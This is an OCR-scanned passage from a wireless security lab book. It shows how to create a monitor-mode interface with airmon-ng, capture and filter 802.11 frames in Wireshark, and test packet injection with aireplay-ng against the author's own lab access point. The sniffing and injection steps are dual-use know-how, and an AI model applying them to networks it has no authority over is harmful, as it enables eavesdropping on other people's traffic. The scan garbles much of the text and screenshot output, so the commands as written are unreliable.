TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 





To put our card into monitor mode, we will use the ai r mon- ng utility which is 
available by default on BackTrack. First run ai r mon- ng to verify it detects the 
available cards. You should see the wl an0 interface listed in the output: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 








Chipset Driver 


RTL8187 rtl18187 - [phy9] 


nee 
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4. Nowenterairmon-ng start wlan to create a monitor mode interface 


corresponding to the wl an0 device. This new monitor mode interface will be 
named mon0. You can verify it has been created by running ai r mon- ng without 
arguments again: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 








Trootebt :~# airmon-ng start wlanO 


Interface Chipset Driver 


wlanO RTL8187 rtl8187 - [phy90] 
(monitor mode enabled on mond) 


root(bt :~# 
root@ot:-# airmon-ng 
Interface Chipset Driver 


RTL8187 rtl8187 - [phy0] 
RTL8187 rt18187 - [phy0] 


roote@bt:~# J 





5. Also, runningi f conf i g should now display a new interface called mon0: 


rootibt: = - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


ootebt:~# ifconfig 

lo Link encap:Local Loopback 
inet addr:127.0.80.1 Mask:255.0.0.0 
UP LOOPBACK RUNNING MTU:16436 Metric:1 
RX packets:0 errors:0 dropped:8 overruns:0 frame:6 
TX packets:8 errors:8 dropped:8 overruns:8 carrier: 
collisions:8O txqueuelen:8 
RX bytes:8 (8.0 B) TX bytes:0 (0.0 B) 


Link encap:UNSPEC  Hwaddr 88-C8-CA-3E-BD-93-00-00-68-00-00-080-080-68-00-600 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:3794 errors:0 dropped:8 overruns:8 frame: 

TX packets:8 errors:6 dropped:8 overruns:8 carrier: 

collisions:0 txqueuelen:1000 

RX bytes:422986 (422.9 KB) TX bytes:0 (8.0 B) 


Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 

UP BROADCAST MULTICAST HMTU:1588 Metric:1 

RX packets:8ü errors:@ dropped:8 overruns:8 frame: 
TX packets:8 errors:0 dropped:8 overruns:0 carrier: 
collisions:8 txqueuelen: 1008 

RX bytes:8 (8.0 B) TX bytes: (0.0 B) 


Link encap:UNSPEC Hwaddr 88-C8O-CA-3E-BD-93-00-08-88-00-00-00-00-00-00-00 
UP RUNNING MTU:@ Metric:1 

RX packets:0 errors: dropped:8 overruns:0 frame:6 

TX packets:8 errors:8 dropped:8 overruns:8 carrier: 

collisions:ü txqueuelen: 1008 

RX bytes:8 (8.0 B) TX bytes:0 (0.6 B) 


rootebtr# J 
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We have successfully created a monitor mode interface mo n0 . This interface will be used to 
sniff wireless packets off the air. This interface has been created for our wireless Alfa card. 





It is possible to create multiple monitor mode interfaces using the same physical card. Use 
theai r mon- ng utility to see how you can do this. 


Awesome! We have a monitor mode interface just waiting to read some packets off the air. 
So let's get started! 





Follow these instructions to begin sniffing packets: 


1. Power up our access point Wi rel ess Lab which we configured in Chapter 1, 
Wireless Lab Setup. 


E ——————————————————————M—————————————— = = 
Device Description Packets Packets/s i 


gil. wmasterO (gj start Bg Options | 
gi. wlano Start | ligi Options | 


m 


monO 1378 160 Options 
p 


an Pseudo-device that captures on all interfaces 1378 
y p 


gi lo 127.0.0.1 


Ii Help | 
[Ready to load or capture | No Packets | Profile: Default 
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3. Select packet capture from the mon0 interface by clicking on the Start button to the 
right of the mon0 interface as shown in the preceding screenshot. Wireshark will 
begin the capture and now you should see packets within the Wireshark window: 


mono: Capturing - Wireshark 


File Edit View Go Capture = Statistics Help 
XTIBIA a FT LSE aAa anaal 9 
v| db Expression... & Clear| S Apply 


.807053 : Broadcast 2 Beacon frame, SN-2779, BI-100, SSID-Broadcasi 
.807999 :25:5e:17:41: Broadcast Beacon frame, SN-2780, BI-100, SSID-Broadcasi 
.809003 :25:5e:17:41: Broadcast Beacon frame, SN-2781, -0, BI=100, SSID-Broadcas! 
.893257 :25:5e:17:41: Broadcast Beacon frame, SN-2782, -0, B BI-100, SSID="Vivek" 

.906100 :25:5e:17:41: Broadcast Beacon frame, SN-2783, -0, BI=100, SSID=Broadcasi 
. 907052 :25:58:17:41: Broadcast Beacon frame, SN-2784, -0, BI=100, SSID-Broadcas! 
. 908047 :25:5e:17:41: Broadcast Beacon frame, SN-2785, BI-100, SSID-Broadcasi 
.992247 :25:5e:17:41: Broadcast Beacon frame, SN-2786, BI-100, SSID="Vivek" 





b Frame 1 (131 bytes on wire, 131 bytes captured) 
P Radiotap Header vO, Length 32 

P IEEE 802.11 Beacon frame, Flags: ........ E 

P IEEE 802.11 wireless LAN management frame 


OO OO 20 OO 2f 48 OO OO 7a 97 62 2c OO OO OO 00 
10 02 6c O9 aO OO cf O1 GO OO OO OO OO OO OO OO 
80 00 OO OO ff ff ff ff ff ff OO 25 Se 17 41 4c 
00 25 Se 17 41 4c aO 9a fc el O3 67 1f 00 00 00 


[ mono: «live capture in progress Fi.. - Packets: 876 Displayed: 876 Marked: 0 1 Profile: Default 





4. These are wireless packets which your Alfa Wireless card is sniffing off the air. In 
order to view any packet, select it in the top window and the entire packet will be 
displayed in the middle window: 


AV OK 
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(Untitled) - Wireshark 
File Edit View Go Capture Analyze Statistics Help 


[Y Filter: 


. 769009 00:25:5e:17:41:4c (RA IEEE 802 Acknowledgement, Flags=........ 

. 770008 IntelCor 35:fc: 00:25:5e:17:41:4c IEEE Data, SN-1667, FN=0, Flags=. paises TC 

.771008 IntelCor 35:fc:44 (RA IEEE Acknowledgement, Flags=........ C 

.799267 00:25:5e:17:41: Broadcast IEEE Beacon frame, SN-1861, FN-0, Flags=........ C, BI-100, SSID-"Vivek" 

. 802229 ashe eile T Broadcast Beacon frame, SN=1862, FN-0, Flags=........ C, BI=100, SSID=Broadcasi 
. 802766 :25:5e:17:41: Broadcast Beacon frame, SN-1863, FN-0, Flags=........ C, BI-100, SSID-Broadcasi 
.803660 :25:5e:17:41: Broadcast Beacon frame, SN-1864, FN-0, Flags=........ C, BI-100, SSID-Broadcasi 
.847494 :25:5e:3d:47: Broadcast Beacon frame, SN=717, FN-0, Flags=........ C, BI-100, SSID-Broadcast 





22739 (102 bytes on wire, 102 bytes captured) 
Radiotap Header vO, Length 32 
IEEE 802.11 Beacon frame, Flags: ........ [e 
"v IEEE 802.11 wireless LAN management frame 
v Fixed parameters (12 bytes) 
Timestamp: Ox0000001F728F8255 
Beacon Interval: 0.102400 [Seconds] 
P Capability Information: Ox0401 
"7 Tagged parameters (30 bytes) 
b SSID parameter set: Broadcast 
P Supported Rates: 1.0(B) 2.0(B) 5.5(B) 11.0(B) 
b DS Parameter set: Current Channel: 1 
b Traffic Indication Map (TIM): DTIM O of 1 bitmap empty 
b ERP Information: no Non-ERP STAs, do not use protection, long preambles 
b Extended Supported Rates: 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0 


:{ Packets: 22742 Displayed: 22742 Marked: 0 Dropped: 0 ‘[ Profile: Default 





5. Click on triangle in front of IEEE 802.11 wireless LAN management frame to expand 
and view additional information. 


6. Look at the different header fields in the packet and correlate them with the WLAN 
frame types and sub-types you have learned earlier. 


X 89950 


We just sniffed our first set of packets off the air! We launched Wireshark which used the 
monitor mode interface monO we have created previously. You will notice by looking at the 
footer region of Wireshark the speed at which the packets are being captured and also the 
number of packets captured till now. 
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Have a go hero - finding different devices 


Wireshark traces can be a bit daunting at times, and even for a reasonably populated 
wireless network, you could end up sniffing a few thousand packets. Hence, it is important to 
be able to drill down to only those packets which interest us. This can be accomplished using 
filters in Wireshark. Explore how you can use these filters to identify unique wireless devices 
in the traces—both access points and wireless clients. 


If you are unable to do this, don't worry as this is the next thing we will learn. 





Time for action — viewing Management, Control, and Data frames 


Now we will learn how to apply filters in Wireshark to look at management, control, 
and data frames. 


Please follow these instructions step-by-step: 


1. Toview all the Management frames in the packets being captured, enter the filter 
wlan.fc.type -- 0 into the filter window and click on Apply. You can stop the packet 
capture if you want to prevent the packets from scrolling down too fast: 


ral (Untitled) - Wireshark 
File Edit View Go Capture Analyze Statistics Help 


J a g a A exala ea a F Lie «era si 
AZ] Filter: |wlan.fc.type == o v| dp Expression... & Clear f Apply 


22696 193.691008 IEEE 802 Beacon frame, SN=1859, FN-0, Flags- sae Rod. C, BI-100, SSID-Broadcas! | 
22697 193.692119 IEEE 802 Beacon frame, SN=1860, FN-0, Flags- T. C, BI-100, SSID-Broadcasi 
22723 193.742956 IEEE 802 Beacon frame, SN-714, FN=0, Flags- EEREN E C, BI=100, SSID=Broadcast 
22738 193.799267 IEEE 802 Beacon frame, SN=1861, FN=0, Flags=........ C, BI=100, SSID="Vivek" | 
22739 193.802229 IEEE 802 Beacon frame, SN-1862, FN-0, Flags=........ C, BI=100, SSID=Broadcasi 
22740 193.802766 :17:41:4e IEEE 802 Beacon frame, SN=1863, FN=0, Flags= OT Or C, BI=100, SSID-Broadcas! | 
22741 193.803660 17:41: 4f IEEE 802 Beacon frame, SN=1864, FN=0, Flags=........ C, BI-100, SSID=Broadcasi | 
22742 193.847494 :3d: 47:6d IEEE 802 Beacon frame, SN-717, FN-0, Flags=........ C, BI-100, SSID-Broadcast 


Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 


Frame 22739 (102 bytes on wire, 102 bytes captured) 
P Radiotap Header vO, Length 32 
v IEEE 802.11 Beacon frame, Flags: ........ C 
Type/Subtype: Beacon frame (0x08) 
" Frame Control: OxO080 (Normal) 
Version: O 
Type: Management frame (0) 
Subtype: 8 
b Flags: OxO 
Duration: O 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source address: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
BSS Id: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
Fragment number: O 





Sequence number: 1862 


NM Fnama nhanle 2-44: 0 


File: "/trmp/etherXxxxKSojxXy" 5280 K... 1 Packets: 22742 Displayed: 9839 Marked: 0 Dropped: 0 1 Profile: Default 


OO OO 20 OO 2f 48 OO OO 
10 02 6c 09 aO OO b9 O1 
80 OO OO OO ff ff ff ff 
OO 25 5e 17 41 4d 60 74 
64 OO 01 O4 OO OO Ol O4 
04 OO Ol OO OO 2a Ol O4 
60 6c e7 45 eb cd 


2a 37 ee 37 00 OO 00 00 
00 OO OO OO OO OO OO OO 
ff ff 00 25 Se 17 41 4d 
55 82 8f 72 1f 00 00 00 
82 84 8b 96 03 O1 01 05 
32 08 Oc 12 18 24 30 48 


eok 





To view Control Frames, modify the filter expression to read wlan.fc.type == 


Ble Edit Yew Go Capture Analyze Statistics Help 


22717 193, 725067 :5e: 
22719 193. -— 1 250: 
22725 193. 751024 :25:5e: 
22727 193.750993 325: 5e 
22734 193, 765024 
22735 193.769009 
22737 193. 771008 


00:25:5e: 
00:25:58: 
Intelcor 


> Frame 22721 (46 bytes on wire, 46 bytes captured) 
P Radiotap Header vO, Length 32 
? TEEPE 802.11 Acknowledgement, Flags: ........ c 
Type/Subtype: Acknowledgement (Ox1d) 
v Frame Control: OxOOO4 (Normal) 
Version: O 
Type: Control frame (1) 
Subtype: 13 
Flags: OxO 
Duration: O 
Receiver address: 00:25:5e:17:41:4c (00:25:5e:1 
> Frame check sequence: QOxaaS9e218 [correct] 


Ble Edt yew Go Capture Analyze Statistics Help 


IntelCor_%5i:fe: 
IntelCor 35:fc: 
IntelCor 3$:fc: 
Intelcor. 35: sfc: 


193. 650141 
193, 650932 
193. 669940 
193. 680178 
193.695104 
193, 700020 
103 T^v) 


Intelcer. 
00:25:56: 


Tatal ar 


Q0: 25:58:17:41: ac 
IntelCor 35:10:44 
mnn. mmu 18+ 41 «4 


b Radiotap Header vó, Geri 32 
" IEEE 902.11 Data, Flags: .p.....TC 
Type/Subtype: Data (0x20) 
P Frame Control: Ox4108 (Normal) 
Duration: 44 
5 Id: 00:25:5e:17:41:4c (00:25:5e:17:41:4c] 
Source address: 
Destination address: 00:25:59 
Fragment number: O 
Sequence number; 1688 
P Frame check sequence: Oxclbccada [correct] 
> TKIP parameters 
" Data (60 bytes) 
Data: 


Packets: 22742 Disp 


IntelCor 35:1c:44 [00:22: 1b: 35: 
:17:41:4c (00:25:56 


(Untitled) - Wireshark 


17:41:4c (RA IEEE 602 Acknowledgement, 
17:41:4c (RA IEEE Boz Acknowledgement, 
7:4l:dc (RA IGE 802 Acknowled 


jamant, 


17:41:4c (AA IELE 802 2 acknowledgenent, 


:17:41:4c (RA IEEE BO2 Acknowledgement, 


17:41:4c (RA IEEE BO2 Acknowledgement, 
17:41:4c (PA IEEE G02 Acknowledgement, 


_3$:f¢:44 (RA IEEE B02 Acknowledgement, 


7:41:4c] 


(Untitied) - Wireshark 


35:fc:44 
17:41:4c 
qud e+ AA 


Fi sre- ^ 


t¢:44) 
:17:41:4c] 


1953838067 4B581FFED2F6715317E568846224448563B07 AAAOA, . . 


AVV 


Flags*.p....F.C 


Flagss.p..... TC 


mu 


Profile: Default : 
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4. To additionally select a sub-type, use the wlan.fc.subtype filter. For example, to view 
all the Beacon frames among all Management frames use the following filter (wlan. 
fc.type == 0) && (wlan.fc.subtype == 8). 


S) mono: Capturing - Wireshark 


File Edit View Go Capture Analyze Statistics Help 


SeAaAAeisaxezeair.esnFy & Q &« Fla CS 36103 


AZ) Eiter: | (wLan.fc.type == 0) && (wlan.fc.subtype == 8) ~| 4p Expression... | & Clear af Apply 


wc me [eee emo Jemen] 00 T 


.156276 Broadcast IEEE 802 Beacon frame, SN-3899, FN-0, Flags=........ BI-100, SSID-Broadcasi 
.259845 Ege x ee Broadcast IEEE E Beacon frame, SN=3900, FN=0, Flags=........ E BI-100, SSID-"Vivek" 
.260752 00:25:5e:17:41:4d Broadcast IEEE 802 Beacon frame, SN=3901, FN=0, Flags=........ C, BI=100, SSID=Broadcas1 
.261721 00:25:5e:17:41:4e Broadcast IEEE 802 Beacon frame, SN-3902, FN-0, Flags- ota 08) EE C, BI-100, SSID-Broadcasi 
.262720 00:25:5e:17:41:4f Broadcast IEEE Beacon , SN=3903, FN-0, Flags=........ C, BI-100, SSID-Broadcasi 
.351988 00:25:5e:17:41:4c Broadcast IEEE Beacon SN-3904, FN=0, Flags=........ C, BI=100, SSID="Vivek" 
.354111 00:25:5e:17:41: 4d Broadcast IEEE Beacon SN=3905, FN-0, Flags=........ C, BI=100, SSID-Broadcasi 
. 354957 00:25:5e:17:41:4e Broadcast IEEE Beacon SN-3906, FN=0, Flags= ae eae C, BI-100, SSID-Broadcasi 


^ccna77 Fs Ens 17. Als A4 [Te Tree CAIN rain FI anne = MT —1 Fn CCT NM nan ndannd 


ya 
187 
188 
189 
207 
208 
209 


as 


INNNNNBINN 


P Frame 187 (102 bytes wire, 102 bytes captured) 
P Radiotap Header vO, Length 32 
"v IEEE 802.11 Beacon frame, Flags: 
Type/Subtype: Beacon frame (0x08) 
" Frame Control: Ox0080 (Normal) 
Version: O 
Type: Management frame (0) 
Subtype: 8 
b Flags: OxO 
Duration: O 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source address: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
BSS Id: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
Fragment number: O 
Sequence number: 


OO OO 20 OO 2f 
10 02 6c 09 aO 
80 OO OO OO ff 
00 25 Se 17 41 
64 OO 01 O4 OO 
04 OO 01 OO OO 
60 6c 3a 8a 91 





mono: «live capture in progress? Fi... 1 Packets: 25328 Displayed: 18234 Marked: 0 1 Profile: Default 





5. Alternatively, you can right-click on any of the header fields in the middle window 
and then select Apply as Filter | Selected to add it as a filter: 


WV 
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(Untitled) - Wireshark 


fle Edt view Go Capture Analyze Statistics Help 


aede buxa eS VFZL EBRR D BMS B 


CHHLUÓONEMUCC THREE 7 NEC 7T TÉ CRM - 


Sel AST eas D0T25T58T >A Pra, Sr sit, i 
20985 451.824265 00:25:Se: 17:41: sad Broadcast IES BOZ Beacon fikin, 5821039, PN=O, P 6I=100, sstD=ercadcas! 
26005 451.024001 00:25:5e:17:41:4e Broadcast IEEE 002 Beacon frame, SN=1040, FN*9, UI*100, SSID-Groadcas! 
26987 451.825628 00:25:5a:17:41:4t Broadcast Thee 802 Beacon frame, SN-1041, Pied, z BI:100, SSTD-roadcasi 


27999 ^ - . b:bl 8 dc ast pee gp ‘ n fram SN 


26005 451. 919419 00:25:5e:17:41:4c Broadcast IERE 802 Beacon frame, 5N-1042, P aI =100, SD Vivek 
26990 451.919513 00:75:5e:17:41:4d Broadcast Ipe 802 Reacon frame, SN-1043, | z. BIs100, SSiDe#roadcast 
2699] 451.520542 200:25:5e:17:41:4e Broadcast IEEE 802 Beacon frame, SN«1044, F BIs100, SSID«sBroadcas! 
26992 451.921351 200:25:5e:17:41:4f Broadcast IEEE B02 Beacon frame. $N-1045, P BI=100, SS5ID-Sroadcas! » 


P Frame 26908 (102 bytes on wire, 102 bytes captured) 
b Radiotap Header vO, Length 32 
T IRE B02.11 Beacon frame, Flags: ........C 


Expand All 
Collapse All 


Prepare a Fiker tot Selected 
Colorize with Fiter ^ and Selected 
. gr Selected 


„ and not Selected 
.. of not Selected 


Copy 
Export Selected Packet Bytes... 
@ wa Protocol Page 


© Frer Field Reference 
Protocol Preferences... 


5i 
«. Disable Protocol... 
Resolve Name 


Type and subtype combined [first b... {Packets: 72634 Oesplayed: 73249 Marked: 0 Dropped: 0 





This will automatically add the correct filter expression for you in the Filter field 
as shown: 


(Untitled) - Wireshark 
Edt View Go Capture Analyze Statistics Help 


11211. í—— ^ € 9 wTExlEN«ae«ravxEmEi u 


memes Emm Protocol eee aaa 


26996 451.824901 :17:41:4o Broadcast fee 802 Beacon frame, SN:1040, Find, 812100, SSIO«Broadcasi 
26587 i. 825928 1 :117:41:4f Broadcast t: 802 Beacon TOR SNs1041, E 81«100, SSIOsBroadcasi 


‘988 £ FAS i ‘ l | Broadcast [=e g Hew ' me, N:S 3 Eas Elagsz "eS 7 M cas! 


26009 asl. 919419 1 1:17:41: Broadcast Ieee 802 Beacon gre $1042, Plags=........C, BIZI100, SSIO="Vivek* 

26990 451.919513 t i : Broadcast IEEE 802 Beacon frame, 5N-1043, BIz100, SSID-Broadcas! 
26991 451.920542 Broadcast IEE 002 Beacon frame, SN-1044, 2 Gi-100, SSIO-Uroadcas! 
26992 451.921351 - :41: Broadcast Tete 802 Beacon frame, SN:1045, x t 81-100, SSIO«Broadcasi 
26993 451.960454 :25:5e: : Broadcast lime 802 Beacon frame, SN-4035, E z 812100, SSIO-* Ashahd* 


Se a 8 tw Pee Oe eae te ats ae Mane dane err een rh Ar t uvas em LAE oake 


> Frame 26998 (102 bytes on wire, 102 bytes captured) 
b Radiotap Header vO, Length 32 
" IEEE 02.11 Beacon frame, Flags: ........C 
Type/Subtype: Beacon frame (0x00) 
v Frame Control: OxOOBO (Normal) 
Version: O 
Type: Management frame (0) 
Subtype: 8 
b Flags: OxO 
Duration: O 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source eddress: 00:25:5e:08:db:bb (00:25:5e:06:db:bb) 
BSS Id: 00:25:5e:06:db:bb (00:25:Se:06:db:bb) 
Fragment number: O 








Sequence number: 


BgE88528 
REINERS 
ng9y8Rn5 


File: *&mp/ethenooxUtz|2y* 10 MB ... ]Packets: 72634 Displayed: 41258 Marked: 0 Dropped: 0 
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X GEV OA T 
We just learned how to filter packets in Wireshark using various filter expressions. This helps 
us to monitor selected packets from devices we are interested in, instead of trying to analyze 
all the packets in the air. 








Also, we can see that the packet headers of Management, Control, and Data frames are in 
plain text and does not contain any encryption. This way anyone who can sniff the packets 
can read these headers. It is also important to note that it is also possible for a hacker to 
modify any of these packets and re-transmit them. As there is no integrity or replay attack 
mitigation in the protocol, this is very easy to do. We will look at some of these attacks in 
later chapters. 


You can consult Wireshark's manual to know more about the available filter expressions and 
how to use them. Try playing around with various filter combinations till you are confident 
you can drill down to any level of detail, even a very large packet trace. 


In the next exercise, we will look at how to sniff data packets transferred between our access 
point and wireless client. 





Time for action — sniffing data packets for our network 


In this exercise, we will learn how to sniff Data packets for a given wireless network. For the 
sake of simplicity, we will look at packets without any encryption. 


Follow these instructions to get started: 


1. Switch on the access point we had named Wi rel ess Lab. Let it remain configured 
to use no encryption. 


2. We will first need to find the channel on which the Wi rel ess Lab access point 
is running on. To do this, open a terminal and runai rodump-ng --bssid 
00:21:91: D2:8E: 25 mond where00:21:91: D2: 8E: 25 isthe MAC address of 
our access point. Let the program run, and shortly you should see your access point 
shown on the screen along with the channel it is running on: 


ag —— 
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root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 








CH 4 ][ Elapsed: 12 s ][ 2010-12-23 09:11 
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8E:25 -52 5 0 0 11 54 . OPN Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 





3. We can see from the preceding screenshot that our access point Wireless Lab is 
running on Channel 11. Note that this may be different for your access point. 


4. In order to sniff data packets going to and fro from this access point, we need to 
lock our wireless card on the same channel that is channel, 11. To do this run the 
commandi wconfig mon0 channel 11 andthenruni wconfig mon0 to verify 
the same. You should see the valueFrequency: 2.462 GHz in the output. This 
corresponds to Channel 11: 


e fe root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


root@bt:~# iwconfig monO channel 11 
t 
:~# 
:~# iwconfig mond 
IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-Power=27 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 


Power Management: off 

Link Quality:® Signal level:0 Noise level:0 

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 
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5. Now fire up Wireshark and start sniffing on the mon0 interface. After Wireshark has 
started sniffing the packets, apply a filter for the bssi d of our access point as shown 
next using wlan.bssid == 00:21:91:D2:8E:25 in the filter area. Use the appropriate 
MAC address for your access point: 


File Edit View Go Capture Analyze Statistics Help 


me 


. 582950 
. 687888 
.779111 
.885418 
. 989903 
.119027 
. 293779 
. 399670 
. 526868 
. 604803 


mono: Capturing - Wireshark 


[- KOZ BET Broauca SU 


OUUDUOVDVGDIVIUDIYIA 


-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link_d2: 
-Link d2: 


8e: 
8e: 
8e: 
8e: 
8e: 
8e: 
8e: 
8e: 
8e: 
8e: 


25 
25 
25 
25 
25 
25 
25 
25 
25 
25 


Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 
Broadcast 


802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 
802 Beacon 


SN=2509, 
SN=2510, 
SN=2511, 
SN=2512, 
SN=2513, 
SN=2514, 
SN=2516, 
SN=2517, 
SN=2518, 
SN=2519. 





P Frame 27 (98 bytes on wire, 98 bytes captured) 
P Radiotap Header vO, Length 32 
v IEEE 802.11 QoS Data, Flags: ... 
Type/Subtype: QoS Data (0x28) 
P Frame Control: OxOA88 (Normal) 
Duration: 320 
Destination address: HonHaiPr 40:00:al (00:1d:d9:40:00:a1) 
BSS Id: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
Source address: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
Fragment number: O 
Sequence number: 18 
b Frame check sequence: 0x437ffOc3 [correct] 
b ANS Cantral 


0000 00 OO 20 OO 2f 48 OO OO 72 Of 91 02 Ol OO OO OO 
0010 10 02 Se O9 aO OO d2 Ol 00 0O OO OO OO OO OO 00 
0020 88 Oa 40 Ol OO ld d9 40 OO al OO 21 91 d2 Se 25 
0030 00 21 91 d2 8e 25 20 O1 O00 00 aa aa 03 00 OO 00 


[ mono: «live capture in progress? Fi... 1 Packets: 12097 Displayed: 4367 Marked: 0 ‘| Profile: Default 


alr blat 








6. In order to see the data packets for our access point, add the following to the filter 
(wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type subtype == 0x20). Open your 
browser on the client laptop and type in the management interface URL of the 
access point. In my case, as we saw in Chapter 1, itishttp://192.168. 0. 1. This 
will generate data packets that Wireshark will capture: 


AXE 


Chapter 2 


mono: Capturing - Wireshark 


File Edit View Go Capture Analyze Statistics Help 


e a me dg mx 2ea nF LBS acai a ES H 


M Filter: | (wLan.bssid == 00:21:91:d2:8e:25) && (wlan.fc. v| 4p Expression... 





11281 275.990568 IntelCor 35:fc:44 Broadcast ARP Who has 192.168.1.1? Tell 192.168.1.6 
11465 277.109661 IntelCor 35:fc:44 Broadcast ARP Who has 192.168.1.6? Tell 0.0.0.0 

11466 277.110655 IntelCor 35:fc:44 Broadcast ARP Who has 192.168.1.1? Tell 192.168.1.6 
11583 278.099530 IntelCor 35:fc:44 Broadcast ARP Who 192.168.1.1? Tell 192.168.1.6 


11765 279.329017 IntelCor 35:fc:44 Broadcast 192.168.1.1? Tell 192.168.1.6 








b Frame 12700 (96 bytes on wire, 96 bytes captured) 
P Radiotap Header vO, Length 32 
v IEEE 802.11 Data, Flags: ......F.C 
Type/Subtype: Data (0x20) 
"v Frame Control: Ox0208 (Normal) 
Version: O 
Type: Data frame (2) 
Subtype: O 
b Flags: Ox2 
Duration: O 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
BSS Id: D-Link d2:8e:25 (00:21:91:d2:8e:25) 
Source address: IntelCor 35:fc:44 (00:22:fb:35:fc:44) 





OO OO 20 00 2f 48 OO OO 72 06 d9 54 00 00 OO 00 
10 02 9e O9 aO OO dl O1 00 OO OO OO OO OO OO 00 
O8 02 OO OO ff ff ff ff ff ff 00 21 91 d2 Se 25 
00 22 fb 35 fc 44 40 4c aa aa 03 OO 00 OO 08 06 


[ mono: «live capture in progress? Fi... 1 Packets: 49979 Displayed: 40 Marked: 0 1 Profile: Default 








7. As you can see, packet sniffing allows us to analyze unencrypted data packets very 
easily. This is the reason why we need to use encryption in wireless. 





We have just sniffed data packets over the air with Wireshark using various filters. As our 
access point is not using any encryption, we are able to see all the data in plain text. This is a 
major security issue as anyone within RF range of the access point can see all the packets if 
he uses a Sniffer like Wireshark. 


We 
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Use Wireshark to analyze the data packets further. You would notice that a DHCP request 

is made by the client and if a DHCP server is available, it responds with an address. Then 

you would find ARP packets and other protocol packets on the air. This is a nice and simple 
way to do passive host discovery on the wireless network. It is important to be able to see 

a packet trace and reconstruct how applications on the wireless host are communicating 
with the rest of the network. One of the interesting features Wireshark provides is to 
"Follow a Stream". This allows you to view multiple packets together, which are part of a TCP 
exchange, in the same connection. 


Also, try logging into gmail.com or any other popular website and analyze the data 
traffic generated. 


We will now see a demonstration of how to inject packets into a wireless network. 


Time for action — packet injection 


We will be using the a! replay- ng tool which is available in BackTrack for this exercise. 





Follow these instructions carefully: 


1. Inorderto do an injection test, first start Wireshark and the filter expression (wlan. 
bssid == 00:21:91:d2:8e:25) && !(wlan.fc.type_subtype == 0x08). This will ensure 
that we only see non-beacon packets for our lab network. 


2. Nowrunthe following commandaireplay-ng -9 -e Wireless Lab -a 
00:21:91: d2:8e:25 mond on a terminal: 


root@bt: ~ - Shell - Konsole 
Edit View Bookmarks Settings Help 
‘obt:-# aireplay-ng -9 -e "Wireless Lab" -a 00:21:91:d2:8e:25 mond 
: Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11 
Trying broadcast probe requests... 
Injection is working! 
Found 1 AP 


Trying directed probe requests... 


00:21:91:D2:8bE:25 - channel: 11 - ‘Wireless Lab' 
Ping (min/avg/max): 2.400ms/20.042ms/81.616ms Power: -47.13 
30/30: 100% 


T 1mOÉ T *.. 
dh . 
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3. Go back to Wireshark and you should see a lot of packets on the screen now. Some 
of these packets have been sent by a! rep! ay- ng which we launched, and others 
are from the access point Wi r el ess Lab in response to the injected packets: 


mono: Capturing - Wireshark 


File Edit View Go Capture Analyze Statistics Help 


8.123849 00:b3:b2:af:a6:11 D-Link_d2:8e:25 2 Null function (No data), SN=446, FN=0, Flags= 
.124407 00:b3:b2:af:a6:11 D-Link_d2:8e:25 Authentication, SN=6, FN=0, Flags= 

.123870 00:b3:b2:af:a6:11 D-Link_d2:8e:25 Null function (No data), SN=446, FN=0, Flags=....... 
.l24415 00:b3:b2:af:a6:11 D-Link_d2:8e:25 Authentication, SN=6, FN=0, Flags=........ 

.147007 D-Link_d2:8e:25 00:b3:b2:af:a6: Probe Response, SN=2770, FN-0, Flags=........ C, BI=1 
.149937 D-Link_d2:8e:25 00:b3:b2:af:a6: Deauthentication, SN=2771, FN=0, Flags= 

.152106 D-Link d2:8e:25 00:b3:b2:af:a6: Authentication, SN=2772, FN-0, Flags=........ C 
.152989 J D-Link d2:8e:25 00:b3:b2:af:a6: Authentication, SN=2772, FN-0, Flags-.... 

.153808 D-Link d2:8e:25 00:b3:b2:af:a6: Authentication, SN=2772, FN-0, Flags-.... 

.154559 D-Link d2:8e:25 00:b3:b2:af:a6: Authentication, SN=2772, FN-0, Flags-.... 

.155552 D-Link d2:8e:25 00:b3:b2:af:a6: Authentication, SN=2772, FN=0, Flags-.... 





b Frame 2863 (369 bytes on wire, 369 bytes captured) 
P Radiotap Header vO, Length 32 
"v IEEE 802.11 Probe Response, Flags: ........ E 
Type/Subtype: Probe Response (0x05) 
v Frame Control: 0x0050 (Normal) 
Version: O 
Type: Management frame (0) 
Subtype: 5 
P Flags: OxO 
Duration: O 
Destination address: 00:87:e5:3a:0b:f8 (00:87:e5:3a:0b:f8) 
